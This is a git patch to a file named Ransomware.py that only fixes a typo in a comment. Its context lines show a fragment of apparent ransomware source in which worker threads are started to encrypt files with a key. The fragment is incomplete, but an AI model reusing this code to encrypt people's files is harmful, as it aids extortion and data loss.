From 21f9c6abf3cd15d3ecc6e0efd8899d0f061b5120 Mon Sep 17 00:00:00 2001 From: TheHacker-arch <77392606+Thehacker-arch@users.noreply.github.com> Date: Sat, 11 Mar 2023 18:19:41 +0530 Subject: [PATCH] Update Ransomware.py --- Ransomware.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Ransomware.py b/Ransomware.py index c3fe4bd..6ce67c9 100644 --- a/Ransomware.py +++ b/Ransomware.py @@ -124,7 +124,7 @@ def CallErrorBox(): # Making Simple Error Box in Tk if len(threading.enumerate()) < MaxThread: # IF your Worker List is Free EncrypterObj = D_E_ncrypt(FilePath, Box) # Pass in file name And key - threading.Thread(target=EncrypterObj.FileE, args=()).start() # to Encypte. + threading.Thread(target=EncrypterObj.FileE, args=()).start() # to Encypt. break # Break Out